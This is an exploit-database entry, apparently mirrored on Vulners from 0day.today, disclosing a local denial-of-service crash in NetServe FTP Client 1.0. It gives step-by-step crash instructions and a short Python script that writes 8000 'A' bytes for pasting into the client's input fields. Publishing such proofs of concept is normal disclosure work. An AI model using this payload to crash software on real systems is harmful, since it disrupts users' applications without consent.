Lucene search
K

NetServe FTP Client 1.0 Local Buffer Overflow Exploit

🗓️ 13 Aug 2015 00:00:00Reported by Un_N0nType 
zdt
 zdt
🔗 0day.today👁 12 Views

NetServe FTP Client 1.0 DOS (Overflow) exploit on Windows 7 x6

Code
********************************************************************************************
# Exploit Title: NetServe FTP Client 1.0 DOS (Overflow).
# Date: 8/12/2015
# Exploit Author: Un_N0n
# Software Link:  http://netserve-ftp-client.en.softonic.com/
# Version: Version 1.0.0 
# Tested on: Windows 7 x64(64 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- Open up NetServeFTPClient.exe
2- Click on 'Site List'.
3- Select any Directory and Click on NEW.
4- In the Fields like NAME, FTP_PATH, Username, Password Paste in the Junk Produced by PY script given Below.
Program will crash saying 'Run Time Error (6), Overflow'.

[Reason?]
Acc to MSDN:"An overflow results when you try to make an assignment that exceeds the limitations of the target of the assignment."
REF for More Info: https://msdn.microsoft.com/en-us/library/aa264525(v=vs.60).aspx


[Code to produce evil bleh.txt ;)]: 
data = "\x41" * 8000
file = open("bleh.txt","w")
file.write(data)
file.close()

[Link for Software: ]
http://netserve-ftp-client.esoftfinder.com/download/
**********************************************************************************************************************************************

#  0day.today [2018-01-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Aug 2015 00:00Current
7High risk
Vulners AI Score7
12